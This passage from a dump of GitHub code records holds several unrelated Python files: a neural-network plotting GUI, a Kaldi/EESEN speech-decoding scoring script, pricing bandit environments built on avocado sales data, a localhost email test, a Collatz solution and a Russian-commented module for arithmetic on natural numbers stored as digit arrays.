val\n\n def b20(self, val):\n self.b2[0] = val\n\n def b21(self, val):\n self.b2[1] = val\n\n def sigm(self, x):\n return 1/(1+np.exp(-x))\n\n\n def neural_net(self, x, A1, A2, b1, b2, ind):\n def layer(x, A, b):\n return self.sigm(A.dot(x) + b)\n y1 = layer(x, A1, b1)\n y2 = layer(y1, A2, b2)\n return y2[ind]\n\n datx = np.arange(-13, 13, 1)\n daty = np.arange(-13, 13, 1)\n\n X, Y = np.meshgrid(np.arange(-13, 13, 1), np.arange(-13, 13, 1))\n\n #Z = X + Y\n def make_z(self, ind):\n Z = []\n for i in self.daty:\n ls = []\n for j in self.datx:\n ls.append(self.neural_net(np.array([j, i]), self.A1, self.A2, self.b1, self.b2, ind))\n Z.append(ls)\n return Z\n\n def plot(self):\n self.drawing.hold(False)\n self.another.contourf(self.X, self.Y, self.make_z(1))\n self.drawing.contourf(self.X, self.Y, self.make_z(0))\n self.drawing.set_ylim(-10, 10)\n self.canvas.draw()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = MainWindow()\n main.show()\n sys.exit(app.exec_())\n","repo_name":"nzinci/Neural-networks-graphical-explaining","sub_path":"nnw.py","file_name":"nnw.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41705359292","text":"import os\n\nfrom utils.utils import run_shell\n\n\ndef score(data, words_path, dir,\n word_ins_penalty=None,\n min_acwt=1,\n max_acwt=20,\n acwt_factor=0.05 # the scaling factor for the acoustic scale. The scaling factor for acoustic likelihoods\n # needs to be 0.5 ~1.0. However, the job submission script can only take integers as the\n # job marker. That's why we set the acwt to be integers (5 ~ 10), but scale them with 0.1\n # when they are actually used.\n ):\n if word_ins_penalty is None:\n word_ins_penalty = [0.0, 0.5, 1.0, 1.5, 2.0]\n # decoing_scripts_folder = os.path.join(os.getcwd(), __name__.split(\".\")[0]) # 'kaldi_decoding_scripts'\n # pl_cmd_script = os.path.join(decoing_scripts_folder, \"utils/run.pl\")\n # assert os.path.exists(pl_cmd_script)\n # assert os.access(pl_cmd_script, os.X_OK)\n # symtab = os.path.join(lang_or_graph, \"words.txt\")\n # assert os.path.exists(symtab)\n # assert os.path.exists(os.path.join(dir, \"lat.1.gz\"))\n # assert os.path.exists(os.path.join(data, \"text\"))\n # int2sym_script = os.path.join(decoing_scripts_folder, \"utils/int2sym.pl\")\n # assert os.path.exists(int2sym_script)\n # assert os.access(int2sym_script, os.X_OK)\n # if not os.path.isdir(os.path.join(dir, \"scoring\", \"log\")):\n # os.makedirs(os.path.join(dir, \"scoring\", \"log\"))\n\n # --cmd \"$decode_cmd\" --nj 10 --beam 17.0 --lattice_beam 8.0 --max-active 5000 --acwt 0.9 \\\n # --skip true --splice true --splice-opts \"--left-context=1 --right-context=1\" --skip-frames 3 --skip-offset 1 \\\n # ${lang_dir}_test_${lm_suffix} $exp_base/$test $train_dir/decode_${test}_${lm_suffix} || exit 1;\n\n # words_path = \"wrds.txt\"\n\n if not os.path.exists(f\"{dir}/scoring\"):\n os.makedirs(f\"{dir}/scoring\")\n\n assert os.environ['EESEN_ROOT']\n lattice_scale_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-scale\"\n lattice_add_penalty_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-add-penalty\"\n lattice_best_path_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-best-path\"\n\n # for wip in word_ins_penalty:\n # for ACWT in range(min_acwt, max_acwt):\n # run_shell(\n # f\"{lattice_scale_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n # + f\"{lattice_add_penalty_bin} --word-ins-penalty={wip} ark:- ark:- |\"\n # + f\"{lattice_best_path_bin} --word-symbol-table={words_path} ark:- ark,t:{dir}/scoring/{ACWT}_{wip}_tra\")\n\n # run_shell(f\"cat {data}/text | sed 's:::g' | sed 's:::g' > {dir}/scoring/test_filt.txt\")\n run_shell(\n f\"cat {data}/text | sed 's:::g' | sed 's:::g' | sed 's:::g' > {dir}/scoring/text_filt\")\n\n compute_wer_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/compute-wer\"\n lattice_1best_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-1best\"\n nbest_to_ctm_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/nbest-to-ctm\"\n compute_wer_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/compute-wer\"\n\n int2sym_script = os.path.join(os.getcwd(), \"kaldi_decoding_scripts/utils/int2sym.pl\")\n assert os.path.exists(int2sym_script)\n\n # for wip in word_ins_penalty:\n # for ACWT in range(min_acwt, max_acwt):\n # run_shell(f\"cat {dir}/scoring/{ACWT}_{wip}_tra | {int2sym_script} -f 2- {words_path} | \"\n # + f\" sed 's:::g' | sed 's:::g' | sed 's:::g' |\"\n # + f\"{compute_wer_bin} --text --mode=present ark:{dir}/scoring/text_filt ark,p:- {dir}/details_{ACWT}_{wip} >& {dir}/wer_{ACWT}_{wip}\")\n\n convert_ctm_script = os.path.join(os.getcwd(), \"kws_decoder/eesen_utils/convert_ctm.pl\")\n assert os.path.exists(convert_ctm_script)\n name = \"test_name_\"\n # for wip in word_ins_penalty:\n for ACWT in range(min_acwt, max_acwt):\n if not os.path.exists(f\"{dir}/score_{ACWT}/\"):\n os.makedirs(f\"{dir}/score_{ACWT}/\")\n\n run_shell(\n f\"{lattice_1best_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n + f\"{nbest_to_ctm_bin} ark:- - | \"\n + f\"{int2sym_script} -f 5 {words_path} | \"\n + f\"{convert_ctm_script} {data}/segments {data}/reco2file_and_channel\")\n\n run_shell(\n f\"{lattice_1best_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n + f\"{nbest_to_ctm_bin} ark:- - | \"\n + f\"{int2sym_script} -f 5 {words_path} | \"\n + f\"{convert_ctm_script} {data}/segments {data}/reco2file_and_channel \"\n + f\"> {dir}/score_{ACWT}/{name}.ctm\")\n","repo_name":"pfriesch/PhnKWS","sub_path":"kaldi_decoding_scripts/ctc_decoding/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"18397523414","text":"import itertools\n\nimport lightgbm as lgb\nimport numpy as np\nimport pandas as pd\nfrom gym import Env, spaces\n\nfrom bandits.bandits import BinomialBanditEnv\n\n\nclass PricingBernoulliBanditEnv(Env):\n def __init__(self, num_arms, dist, p_min=1, p_max=17, n_customers=100):\n super(PricingBernoulliBanditEnv, self).__init__()\n\n self.num_arms = num_arms\n self.dist = dist # scipy dist\n self.p_min = p_min\n self.p_max = p_max\n\n self.action_space = spaces.Discrete(num_arms)\n self.observation_space = spaces.Discrete(1) # no observations, only rewards\n\n # normalize the prices to [0, 1]\n self.action_to_price = np.linspace(p_min, p_max, num_arms)\n self.mus = 1 - dist.cdf(self.action_to_price)\n self.b_bandit = BinomialBanditEnv(n=n_customers, probs=self.mus)\n\n self.max_reward = np.max(self.mus * self.action_to_price)\n\n def step(self, action):\n assert self.b_bandit.action_space.contains(action)\n\n observation, conversion_reward, done, info = self.b_bandit.step(action)\n price = self.action_to_price[action]\n reward = conversion_reward * price\n return observation, reward, done, info\n\n def reset(self):\n return 0\n\n\ndef get_avocado_df(avocado_path):\n df = pd.read_csv(avocado_path)\n df = df.drop(columns=[\"Unnamed: 0\"])\n df[\"date\"] = df[\"Date\"].astype(\"datetime64[ns]\")\n df = df.sort_values(\"Date\")\n df = df[df[\"date\"] < \"2018-01-01\"]\n df = df[df[\"type\"] == \"conventional\"].reset_index(drop=True)\n\n df[\"price\"] = df[\"AveragePrice\"]\n df[\"quantity\"] = df[\"Total Volume\"]\n\n cols = [\"date\", \"price\", \"quantity\", \"region\"]\n df = df[cols].copy()\n\n aggregated_regions = [\n \"TotalUS\",\n \"West\",\n \"SouthCentral\",\n \"Northeast\",\n \"Southeast\",\n \"Midsouth\",\n \"Plains\",\n \"GreatLakes\",\n \"California\",\n ]\n df = df[~df.region.isin(aggregated_regions)]\n region_to_volume = df.groupby([\"region\"]).quantity.sum().sort_values(ascending=False).reset_index()\n good_regions = set(region_to_volume[:20].region) - set([\"LosAngeles\", \"NewYork\"])\n df = df[df.region.isin(good_regions)]\n return df\n\n\nclass PricingAvocadoBanditEnv(Env):\n def __init__(\n self,\n num_arms,\n avocado_df,\n region,\n start_date,\n model_path=\"../data/avocado_lgbm_model.txt\",\n T=10000,\n p_min=0.1,\n p_max=1,\n ):\n super(PricingAvocadoBanditEnv, self).__init__()\n\n self.num_arms = num_arms\n self.start_date = start_date\n self.current_idx = 0\n self.region = region\n mm_prices = avocado_df[avocado_df.region == region].price.apply([\"min\", \"max\"])\n self.p_min_dataset = mm_prices[\"min\"]\n self.p_max_dataset = mm_prices[\"max\"]\n self.p_min_scale = p_min\n self.p_max_scale = p_max\n\n self.model = lgb.Booster(model_file=model_path)\n\n self.action_space = spaces.Discrete(num_arms)\n self.observation_space = spaces.Discrete(1) # no observations, only rewards\n\n self.action_to_price = np.linspace(self.p_min_scale, self.p_max_scale, num_arms)\n self.action_to_price_dataset = np.linspace(self.p_min_dataset, self.p_max_dataset, num_arms)\n\n self._prepare_predict_df(avocado_df, T)\n\n def step(self, action):\n assert self.action_space.contains(action)\n\n price = self.action_to_price_dataset[action]\n predict_df = self.price_to_predict_df[price]\n observation = 0\n conversion_reward = predict_df.iloc[self.current_idx, :][\"quantity_norm\"]\n # print(predict_df.iloc[self.current_idx, :])\n self.current_idx += 1\n done = False\n info = None\n price = self.action_to_price[action]\n reward = conversion_reward * price\n return observation, reward, done, info\n\n def reset(self):\n return 0\n\n def _prepare_predict_df(self, avocado_df, T):\n # Preparing the prediction dataframe from which the rewards will be drawn\n # basically, just predicting the grid of [prices, dates]\n\n def cols_to_categorical(df, categorical_columns):\n df[categorical_columns] = df[categorical_columns].astype(\"category\")\n\n def featurize(df):\n df[\"year-month\"] = df[\"date\"].dt.year * 100 + df[\"date\"].dt.month\n df[\"year\"] = df[\"date\"].dt.year\n df[\"month\"] = df[\"date\"].dt.month\n\n end_date = self.start_date + pd.Timedelta(T - 1, unit=\"D\")\n dates = pd.date_range(start=self.start_date, end=end_date)\n predict_df = pd.DataFrame(\n list(itertools.product(self.action_to_price_dataset, dates)),\n columns=[\"price\", \"date\"],\n )\n predict_df[\"region\"] = self.region\n featurize(predict_df)\n categorical_columns = [\"region\"]\n cols_to_categorical(predict_df, categorical_columns)\n model_cols = [\"price\", \"region\"]\n predict_df[\"quantity_without_noise\"] = self.model.predict(predict_df[model_cols])\n self.q_std = avocado_df[avocado_df.region == self.region].quantity.std()\n self.quantity_norm = avocado_df[avocado_df.region == self.region].quantity.max()\n e = np.random.normal(loc=0, scale=self.q_std, size=predict_df.shape[0]) / 5\n predict_df[\"quantity\"] = predict_df[\"quantity_without_noise\"] + e\n predict_df[\"quantity_norm\"] = predict_df[\"quantity\"] / self.quantity_norm\n predict_df[\"quantity_norm\"] = predict_df[\"quantity\"] / self.quantity_norm\n means = predict_df.groupby(\"price\")[\"quantity_norm\"].mean().reset_index()\n means[\"mean_reward\"] = means[\"quantity_norm\"] * self.action_to_price\n self.max_reward = np.max(means[\"mean_reward\"])\n self.predict_df = predict_df\n\n # splitting the dataframe into slices based on prices\n # would speed up the self.step() significantly\n self.price_to_predict_df = {}\n for p in self.action_to_price_dataset:\n mask = np.isclose(self.predict_df[\"price\"], p)\n self.price_to_predict_df[p] = self.predict_df[mask]\n","repo_name":"thxi/hse_thesis","sub_path":"bandits/pricing/bandits.py","file_name":"bandits.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"15623501358","text":"# Import smtplib for the actual sending function\nimport smtplib\n\n# Import the email modules we'll need\nfrom email.mime.text import MIMEText\n\n# Open a plain text file for reading. For this example, assume that\n# the text file contains only ASCII characters.\nmsg = MIMEText(\"This is an example email.\\nIt contains text.\")\n\n# me == the sender's email address\n# you == the recipient's email address\nmsg['Subject'] = 'Dart Battle Beta Test Signup Request'\nmsg['From'] = \"beta.test@dartbattle.fun\"\nmsg['To'] = \"beta.test@dartbattle.fun\"\n\n# Send the message via our own SMTP server, but don't include the\n# envelope header.\ns = smtplib.SMTP('localhost')\ns.sendmail(me, [you], msg.as_string())\ns.quit()\nprint(\"Success.\")","repo_name":"allenstetson/dartBattle","sub_path":"lambda/us-east-1_dartBattle/emailTest.py","file_name":"emailTest.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"21848989793","text":"def collatz(n) :\n if n % 2 : \n return 3 * n + 1\n return n // 2 \n\ndic = {}\n\nfor i in range(2 , 1000001) : \n count = 1 ; num = i \n while num != 1 :\n count += 1 \n num = collatz(num)\n if num in dic : \n count += dic[num] - 1 \n num = 1 \n dic[i] = count \n\na = max(dic.values())\n\nfor k , v in dic.items() : \n if v == a :\n print(k)\n break ","repo_name":"PHNPR/Project-Euler-Problem-Solutions-in-Python","sub_path":"014.py","file_name":"014.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13178772875","text":"# Задача N-1(COM_NN_D): \"Сравнение натуральных чисел\"\r\n# Выполнил Кашуба Д.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр arr1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр arr2[..]\r\n\r\n# Алгоритм:\r\n# 1)Если длина первого больше длины второго, значит первое больше второго.\r\n# 2)Если длина второго больше длины первого, значит второе больше первого.\r\n# 3)Если длины одинаковы, проверяем каждый разряд числа пока не встретим различие: если цифра в рязряде первого числа больше цифры того же разряда второго числа,\r\n# то первое больше второго и наоборот.\r\n# 4)Если длины одинаковы и различий в разрядах нет, то числа равны.\r\n\r\n# Выходные данные:\r\n# 2 - если первое больше второго.\r\n# 1 - если второе больше первого.\r\n# 0 - если числа равны.\r\n\r\ndef COM_NN_D(n1, arr1, n2, arr2):\r\n if (n1 > n2):\r\n return 2\r\n elif (n1 < n2):\r\n return 1\r\n else:\r\n for i in range(0, n1):\r\n if (arr1[i] > arr2[i]):\r\n return 2\r\n elif (arr1[i] < arr2[i]):\r\n return 1\r\n return 0\r\n\r\n\r\n# Задача N-2(NZER_N_B): \"Проверка на ноль\"\r\n# Выполнил Волосевич А.Н. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число, представленных следующим образом:\r\n# Целое число n - номер старшей позиции, и массив цифр A[..]\r\n\r\n# Алгоритм:\r\n# 1)Проверяем все цифры числа.\r\n# 2)Если хотя бы одна цифра не ноль, число не равно нулю.\r\n# 3)Иначе число равно нулю.\r\n\r\n# Выходные данные:\r\n# True - если число не 0\r\n# False - если число 0\r\n\r\ndef NZER_N_B(n: int, A: list) -> bool:\r\n for num in A:\r\n if num != 0:\r\n return True\r\n return False\r\n\r\n\r\n# Задача N-3(ADD_1N_N): \"Добавление 1 к натуральному числу\"\r\n# Выполнил Поллуксов А.В. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход натуральное число, представленное следующим образом:\r\n# Целое число n - номер старшей позиции, и массив цифр arr[..]\r\n\r\n# Алгоритм:\r\n# 1)Добавляем 1 к цифре младшего разряда. Если она равна 9, заменяем её на 0 и добавляем 1 к следующему разряду.\r\n# 2)Если программа таким образом дошла до старшего разряда, который равен 9, значит, у числа появится новый разряд.\r\n\r\n# Выходные данные:\r\n# Целое число n, массив arr[..]\r\n\r\ndef ADD_1N_N(n, arr):\r\n i = n - 1\r\n while i != -1:\r\n arr[i] += 1\r\n if arr[i] == 10:\r\n arr[i] = 0\r\n if i == 0:\r\n arr.insert(0, 1)\r\n n += 1\r\n i -= 1\r\n else:\r\n i = -1\r\n return [n, arr]\r\n\r\n\r\n# Задача N-4(ADD_NN_N): \"Сложение натуральных чисел\"\r\n# Выполнил Егоров И.М. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход A - массив чисел(натуральное число), n_a - количество цифр числа A, то же самое с B.\r\n\r\n# Алгоритм:\r\n# Получаем на вход массив чисел. Присваиваем переменным i и j индексы последнего элемента массива.\r\n# С помощью функции COM_NN_D сравниваем два числа. Если В больше А, только меняем их местами.(Для удобства работы)\r\n# Далее, начиная с последнего элемента начинаем прибавлять к элементу А элемент В.\r\n# Если число получается больше 10, то прибавляем к следующему элементу единицу, а само число A[i] делаем остатком.\r\n# (A[i] % 10). Если достигаем старшей цифры числа, а эта цифра оказывается больше или равна 10:\r\n# То с помощью insert добавляем в массив единицу\r\n\r\n# Выходные данные:\r\n# Возвращаем массив чисел A (получившаяся сумма) и количество цифр в массиве n_a.\r\n\r\ndef ADD_NN_N(n_a, A, n_b, B):\r\n if COM_NN_D(n_a, A, n_b, B) == 1:\r\n tmp = A\r\n A = B\r\n B = tmp\r\n tmp = n_a\r\n n_a = n_b\r\n n_b = tmp\r\n i = n_a - 1\r\n j = n_b - 1\r\n while (i >= 0):\r\n if j >= 0:\r\n A[i] += B[j]\r\n if A[i] >= 10:\r\n A[i] = A[i] % 10\r\n if i > 0:\r\n A[i - 1] += 1\r\n else:\r\n A.insert(0, 1)\r\n n_a += 1\r\n i -= 1\r\n j -= 1\r\n\r\n return [n_a, A]\r\n\r\n\r\n# Задача N-5(SUB_NN_N): \"Вычитание натуральных чисел\"\r\n# Выполнил Шаров А.К. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр a1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр a2[..]\r\n\r\n# Алгоритм:\r\n# Если числа равны, результат - 0.\r\n# Иначе, проверяем, что первое дейтвительно больше второго.\r\n# Далее, алгоритм вычитания в столбик:\r\n# - начиная с младшего разряда, вычитаем из первой цифры вторую\r\n# - если вторая цифра больше первой, занимаем 1 из следующего разряда\r\n# Результат вычитания записывается в отдельный массив res[..]\r\n\r\n# Выходные данные:\r\n# Длина массива res (номер старшей позиции), и сам массив res[..]\r\n\r\ndef SUB_NN_N(n1: int, a1: list, n2: int, a2: list) -> tuple:\r\n res = []\r\n eq = COM_NN_D(n1, a1, n2, a2)\r\n if eq == 0:\r\n res.append(0)\r\n elif eq == 2:\r\n for i in range(1, n1 + 1):\r\n while n1 > n2:\r\n a2 = [0] + a2\r\n n2 += 1\r\n if a1[-i] >= a2[-i]:\r\n res.append(a1[-i] - a2[-i])\r\n if res[-1] < 0: a1[-i + 1] += 1\r\n else:\r\n a1[-i - 1] -= 1\r\n res.append(a1[-i] - a2[-i] + 10)\r\n res.reverse()\r\n while res[0] == 0: res.pop(0)\r\n return len(res), res\r\n\r\n\r\n# Задача N-6(MUL_ND_N): \"Умножение натурального числа на цифру\"\r\n# Выполнил Катрущенко О.Д. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число и цифру\r\n# Целое число n - номер старшей позиции, массив цифр A[..], и цифра D\r\n\r\n# Алгоритм:\r\n# Начиная с младшего разряда, перемножаем разряд на цифру\r\n# - если в результате число из одного разряда, записываем его в массив для ответа\r\n# - если в результате ��исло из двух разядов, то записываем его младший разряд в массив для ответа,\r\n# а старший разряд записываем в вспомогательную переменную, чтобы добавить к результату следующего умножения\r\n\r\n# Выходные данные:\r\n# Целое число n, массив B[..]\r\n\r\ndef MUL_ND_N(n, A, D):\r\n ans = [0 for i in range(n)]\r\n r = 0\r\n for i in range(n - 1, -1, -1):\r\n ans[i] = A[i] * D + r\r\n if ans[i] >= 10:\r\n r = ans[i] // 10\r\n ans[i] = ans[i] % 10\r\n if r != 0:\r\n ans.insert(0, r)\r\n n += 1\r\n return [n, ans]\r\n\r\n\r\n# Задача N-7(MUL_Nk_N): \"Умножение натурального числа на 10^k\"\r\n# Выполнил Пелагейко А.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число и коэффициент\r\n# Целое число n - номер старшей позиции, массив цифр A[..], и коэффициент k\r\n\r\n# Алгоритм:\r\n# заполняем элементы списка нулями, начиная с n-ного элемента и заканчивая n+k\r\n# т.к. итоговое число будет содержать в себе n+k элементов\r\n# увеличиваем счётчик кол-ва цифр\r\n# имеем число n и список a_t, содержащий в себе число, умноженное на 10^k и разбитое на цифры\r\n\r\n# Выходные данные:\r\n# Целое число n, массив a_t[..]\r\n\r\ndef MUL_Nk_N(n, A, k):\r\n a_t = A.copy()\r\n for i in range(n, n + k):\r\n a_t.insert(i, 0)\r\n n += k\r\n return n, a_t\r\n\r\n\r\n# Задача N-8(MUL_NN_N): \"Умножение натурального числа на 10^k\"\r\n# Выполнил Пелагейко А.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр A[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр B[..]\r\n\r\n# Алгоритм:\r\n# если первое число меньше второго - меняем их местами (для удобства работы)\r\n# перемножаем первое число поочерёдно с каждой цифрой из второго числа, начиная с младших разрядов\r\n# сдвигаем разряд произведения, умножив полученное слагаемое на 10^k\r\n# складываем полученные результаты произведений (сумма накапливается в массиве mul0)\r\n# увеличиваем сдвиг (переменная k) на 1\r\n\r\n# Выходные данные:\r\n# Целое число c2, массив mul0[..]\r\n\r\ndef MUL_NN_N(n1, A, n2, B):\r\n mul0 = []\r\n k = 0\r\n\r\n if A == [0] or B == [0]:\r\n c2 = 1\r\n mul0.insert(0, 0)\r\n else:\r\n\r\n if COM_NN_D(n1, A, n2, B) == 1:\r\n A, B = B, A\r\n temp = n1\r\n n1 = n2\r\n n2 = temp\r\n\r\n for i in range(len(B) - 1, -1, -1):\r\n c, L = MUL_ND_N(len(A), A, B[i])\r\n A.reverse()\r\n\r\n c1, L = MUL_Nk_N(c, L, k)\r\n\r\n c2, mul0 = ADD_NN_N(len(mul0), mul0, c1, L)\r\n\r\n k = k + 1\r\n return [c2, mul0]\r\n\r\n\r\n# Задача N-9(SUB_NDN_N): \"Вычитание из натурального другого натурального, умноженного на цифру для случая с неотрицательным результатом\"\r\n# Выполнил Кашуба Д.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр arr1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр arr2[..]\r\n# и цифра D, на которую необходимо умножить\r\n\r\n# Алгоритм:\r\n# Умножаем на число, с помощью функции MUL_ND_N, вычитаем, с помощью функции SUB_NN_N, в которой уже есть проверка на то, равны ли числа\r\n\r\n# Выходные данные:\r\n# n_res - длина числа\r\n# A_res - результат вычитания\r\n\r\ndef SUB_NDN_N(n1, A1, n2, A2, D):\r\n A_res = []\r\n n2, A2 = MUL_ND_N(n2, A2, D)\r\n n_res, A_res = SUB_NN_N(n1, A1, n2, A2)\r\n return n_res, A_res\r\n\r\n\r\n# Задача N-10(DIV_NN_Dk): \"Вычисление первой цифры деления большего натурального на меньшее,\r\n# домноженное на 10^k,где k - номер позиции этой цифры (номер считается с нуля)\"\r\n# Выполнил Поллуксов А.В. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход 2 натуральных числа, представленных следующим образом:\r\n# Целое число (n; arr[..]) - номер старшей позиции и массив цифр\r\n\r\n# Алгоритм:\r\n# 1)Циклично умножаем меньшее число на 10, если в результате оно не будет больше бо́льшего числа\r\n# 2)Параллельно с шагом (1) считаем отступ k\r\n# 3)Пока первое число больше второго, отнимаем из бо́льшего меньшее\r\n# 4)Параллельно с шагом (3) считаем цифру d\r\n\r\n# Выходные данные:\r\n# Первая цифра деления d и его позиция k\r\n\r\ndef DIV_NN_Dk(n_1, arr1, n_2, arr2):\r\n arr_1 = arr1.copy()\r\n arr_2 = arr2.copy()\r\n k = 0\r\n while COM_NN_D(n_1, arr_1, n_2 + 1, arr_2 + [0]) != 1:\r\n n_2, arr_2 = MUL_Nk_N(n_2, arr_2, 1)\r\n k += 1\r\n d = 0\r\n while COM_NN_D(n_1, arr_1, n_2, arr_2) != 1:\r\n n_1, arr_1 = SUB_NN_N(n_1, arr_1, n_2, arr_2)\r\n d += 1\r\n return [d, k]\r\n\r\n\r\n# Задача N-11(DIV_NN_N): \"Частное от деления натуральных чисел\"\r\n# Выполнил Егоров И.М. 1310\r\n\r\n# Входные данные:\r\n# n_1 - длина первого числа, arr_1 - массив цифр первого числа,\r\n# n_2 - длина второго числа, arr_2 - массив цифр второго числа.\r\n\r\n# Алгоритм:\r\n# Создаем результирующий массив k. s - длина массива k. С помощью функции DIV_NN_Dk вычисляем первую цифру частного (arr1 / arr2)\r\n# Прибавляем ее в результирующий массив k. С помощью функции MUL_Nk_N умножаем делитель (arr2) на 10 в степени k_t.\r\n# Вычитаем с помощью функции SUB_NDN_N из arr1 число полученное число t_2 длины t_1 (это arr2 умноженное на 10^k_t)\r\n# Прибавляем 1 к длине результата.\r\n\r\n# Выходные данные:\r\n# Возвращаем результирующий массив k (частное от деления arr1 на arr2 без остатка) и длину этого массива s.\r\n\r\ndef DIV_NN_N(n_1, arr_1, n_2, arr_2):\r\n d_t, k_t = DIV_NN_Dk(n_1, arr_1, n_2, arr_2)\r\n s = k_t + 1\r\n k = [0 for i in range(s)]\r\n while (k_t != 0):\r\n k[s - k_t - 1] = d_t\r\n t_1, t_2 = MUL_Nk_N(n_2, arr_2, k_t)\r\n n_1, arr_1 = SUB_NDN_N(n_1, arr_1, t_1, t_2, d_t)\r\n d_t, k_t = DIV_NN_Dk(n_1, arr_1, n_2, arr_2)\r\n k[s - k_t - 1] = d_t\r\n return [s, k]\r\n\r\n\r\n# Задача N-12(MOD_NN_N): \"Остаток от деления большего натурального числа на меньшее или равное натуральное с остатком(делитель отличен от нуля)\"\r\n# Выполнил Козориз К.И. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два целых числа, представленных следующим образом:\r\n# Число n1, обозначающее кол-во разрядов, и массив arr1[...] размера n1, содержащий цифры в этих разрядах для первого числа\r\n# Аналогично, n2 и arr2[...] для второго числа\r\n\r\n# Алгоритм:\r\n# С помощью DIV_NN_N находим частное, проверяем не равно ли оно 0, если равно - значит наш массив меньше второго массива, поэтому он является остатком\r\n# Если не равно 0 - с помощью SUB_NDN_N вычитаем из первого числа второе, домноженное на результат деления\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - остаток от деления\r\n\r\ndef MOD_NN_N(n1, arr1, n2, arr2):\r\n b = arr1.copy()\r\n while len(arr1) >= n2:\r\n arr1 = b.copy()\r\n a = DIV_NN_N(n1, arr1, n2, arr2)[1]\r\n arr1 = b\r\n\r\n if a[0] == 0:\r\n return n1, arr1\r\n n1, b = SUB_NDN_N(n1, b, n2, arr2, 1)\r\n arr2.reverse()\r\n\r\n return n1, arr1\r\n\r\n\r\n# Задача N-13(GCF_NN_N): \"НОД натуральных чисел\"\r\n# Выполнил Козориз К.И. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два целых числа, представленных следующим образом:\r\n# Число n1, обозначающее кол-во разрядов, и массив arr1[...] размера n1, содержащий цифры в этих разрядах для первого числа\r\n# Аналогично, n2 и arr2[...] для второго числа\r\n\r\n# Алгоритм:\r\n# Проверяем какое из двух чисел больше с помощтю функции COM_NN_D, идем в цикле while до того момента,\r\n# пока arr1 и arr2 не равны нулю, при этом если arr1 > arr2 - записываем в arr1 остаток от деления arr1 на arr2,\r\n# иначе наоборот, в конце выводим большее из двух массивов\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - НОД двух чисел\r\n\r\ndef GCF_NN_N(n1, arr1, n2, arr2):\r\n while NZER_N_B(n1, arr1) == True and NZER_N_B(n2, arr2) == True:\r\n if COM_NN_D(n1, arr1, n2, arr2) == 2: # arr1 > arr2\r\n n1, arr1 = MOD_NN_N(n1, arr1, n2, arr2)\r\n elif COM_NN_D(n1, arr1, n2, arr2) == 1: # arr1 < arr2\r\n n2, arr2 = MOD_NN_N(n2, arr2, n1, arr1)\r\n else:\r\n return n1, arr1\r\n else:\r\n if COM_NN_D(n1, arr1, n2, arr2) == 2: # arr1 > arr2\r\n return n1, arr1\r\n else:\r\n return n2, arr2\r\n\r\n\r\n# N-14(LCM_NN_N): \"НОК натуральных чисел\"\r\n# Выполнил Данилов А.С. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр A1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр A2[..]\r\n\r\n# Алгоритм:\r\n# НОК двух натуральных чисел равен их произведению, деленному на НОД этих чисел\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - НОК двух чисел\r\n\r\ndef LCM_NN_N(n1, A1, n2, A2):\r\n m1, m2 = MUL_NN_N(n1, A1, n2, A2)\r\n g1, g2 = GCF_NN_N(n1, A1, n2, A2)\r\n return DIV_NN_N(m1, m2, g1, 